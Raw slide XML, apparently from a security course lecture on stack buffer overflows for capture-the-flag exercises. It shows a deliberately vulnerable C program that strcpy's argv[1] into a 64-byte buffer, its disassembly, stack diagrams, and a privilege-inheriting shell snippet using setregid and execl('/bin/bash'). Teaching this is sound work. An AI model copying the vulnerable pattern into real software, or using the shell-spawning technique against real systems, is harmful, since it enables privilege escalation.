            <a:off x="457200" y="140765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 spc="-50" normalizeH="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Cambria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NO “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get_a_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”?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2CD43D6-39BF-9440-89B7-376BF36DEDA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2660608"/>
            <a:ext cx="6629400" cy="3892591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:no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Dump of assembler code for function main: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0x080483e4 &lt;+0&gt;:	push   %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a: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0x080483e5 &lt;+1&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a: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0x080483e7 &lt;+3&gt;:	sub    $72,%esp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0x080483ea &lt;+6&gt;:	mov    12(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a: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0x080483ed &lt;+9&gt;:	mov    4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a: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0x080483f0 &lt;+12&gt;:	mov    %eax,4(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)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0x080483f4 &lt;+16&gt;:	lea    -64(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>),%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x080483f7 &lt;+19&gt;:	mov    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)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0x080483fa &lt;+22&gt;:	call   0x8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;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0x080483ff &lt;+27&gt;:	leave  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0x08048400 &lt;+28&gt;:	ret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36BB9C0-D377-9746-9969-ACB6A5DF4302}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8468065" y="1459954"/>
          <a:ext cx="1461558" cy="4817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argv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argc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return</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline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aseline="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>addr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caller’s </a:t>
                      </a:r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ebp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6822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(64</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> bytes)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argv</a:t>
                      </a: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[1]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3D967E8E-ACD0-4742-8FB7-CC60F02D83BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9950308" y="3090633"/>
            <a:ext cx="1032104" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1032104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E34070-7330-664B-801D-CF2EEB5D14C0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="34290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%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" err="1"/>
                <a:t>ebp</a:t>
              </a:r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C8BEA3C-45CF-F349-B942-A828F5E8103D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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rc 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95AE3AFF-1128-4E44-A5DF-DC0BC5F31F8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8118561" y="5541920"/>
            <a:ext cx="685800" cy="534486"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5305641"/>
              <a:gd name="adj2" fmla="val 1647175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3AD28197-581D-CF4B-BD7C-34A391A6A3DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9929623" y="5390606"/>
            <a:ext cx="824189" cy="38100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58DDAE-7C5C-D54E-98DC-4FAA555D73AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10089312" y="6052457"/>
            <a:ext cx="1006456" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1006456" cy="3693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ECBEED-DAF2-4442-A335-4BF86F5CC2BD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000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%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" err="1"/>
                <a:t>esp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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5F85F61-7B74-344B-8B5F-CA2A6BEB9A7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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6DE41FC-2DF0-858E-5C20-6CB18BA16875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675445" y="1196850"/>
            <a:ext cx="5571972" cy="147732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>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int main(int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[64];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Consolas"/>
                <a:cs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249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720038-512C-3D4C-84D3-DAE2BC81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39D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17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B1E0D0A-2E5E-7F45-9D89-86D4BED0A55D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1143000"/>
            <a:ext cx="6629400" cy="54102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endParaRPr lang="en-US" sz="1600">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   …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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0x080483fa &lt;+22&gt;:	call   0x8048300 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;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0x080483ff &lt;+27&gt;:	leave  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   0x08048400 &lt;+28&gt;:	ret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FDFC47-C521-F347-9249-0409EAD170AD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/>
              <a:t>Traditionally, we inject assembly</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>instructions for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exec(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>into buffer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>See “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1"/>
              <a:t>Smashing the stack for</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" i="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1"/>
              <a:t>fun and profit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>” for exact string </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>or search online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16BBD0B-F74E-5547-AF2A-2AD70D3567E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8458200" y="1479548"/>
          <a:ext cx="1461558" cy="4817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argv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argc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+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>buf</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1800">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Consolas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6822">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>shellcode</a:t>
                      </a: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 vert="vert2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argv</a:t>
                      </a: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[1]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1B2EB404-D100-7E43-A9E6-E7D52F3ABF7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9940443" y="3110227"/>
            <a:ext cx="1032104" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1032104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BC2BC7-26C2-DB42-8D84-8570AD54ED4C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="34290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%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" err="1"/>
                <a:t>ebp</a:t>
              </a:r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71871AA-8FA9-824A-B035-43EED3350493}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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A6FF75-6A48-7841-8D6D-2AE83AD3C1E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9940443" y="6097085"/>
            <a:ext cx="1006456" cy="369332"/>
            <a:chOff x="7959243" y="3429000"/>
            <a:chExt cx="1006456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DAEA3F-F284-F146-8ADE-8742AFF9E7D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8229600" y="3429000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%</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" err="1"/>
                <a:t>esp</a:t>
              </a:r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3792F14-75FD-3C4E-8FFB-504B8A54FB76}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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rc 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13FA0C-724E-8C41-A467-5D80CF467218}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7835392" y="2743200"/>
            <a:ext cx="1187704" cy="2819400"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5378754"/>
              <a:gd name="adj2" fmla="val 16251393"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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48C2534-9C67-214B-A6CB-F7D9D7A70720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="140765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 spc="-50" normalizeH="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Cambria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NO “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get_a_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1418006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408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get_a_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600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10515600" cy="2294468"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"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Inherit current privilege and then execute a shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>You can read the flag!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36E620-ACF7-4993-A0CF-1743D529B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50" y="1495005"/>
            <a:ext cx="7554469" cy="17383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5211FC-5F05-E046-9CB5-5B97D05A6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3" y="4287891"/>
            <a:ext cx="12383924" cy="5804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BAD9DA-7B01-C341-B466-D40F7980EFC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="890450" y="5171702"/>
            <a:ext cx="7696200" cy="954107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setregid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getegid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getegid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execl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(“/bin/bash”, “bash”, 0);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3328059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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get_a_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B06090202040302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F578BD-EDAD-DBCD-828C-4708C2793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90" y="1781557"/>
            <a:ext cx="7039243" cy="4658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9B6A3C-B08A-D000-7A00-AF0868F1F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24627"/>
            <a:ext cx="7039243" cy="4658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4D1522-5210-08CA-F922-4D255D0D3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322781"/>
            <a:ext cx="7039243" cy="46588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990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  <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Get effective GID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B06090202040302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</a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gid_t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 err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gid_t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 err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>egid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>real</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>effective</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> gid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:latin typeface="Consolas" panose="020B06090202040302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</a:rPr>
              <a:t>(</a:t>
            </a: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(), </a:t>
            </a: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())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Set real and effective </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>gid</a:t>
            </a:r>
            <a:r>
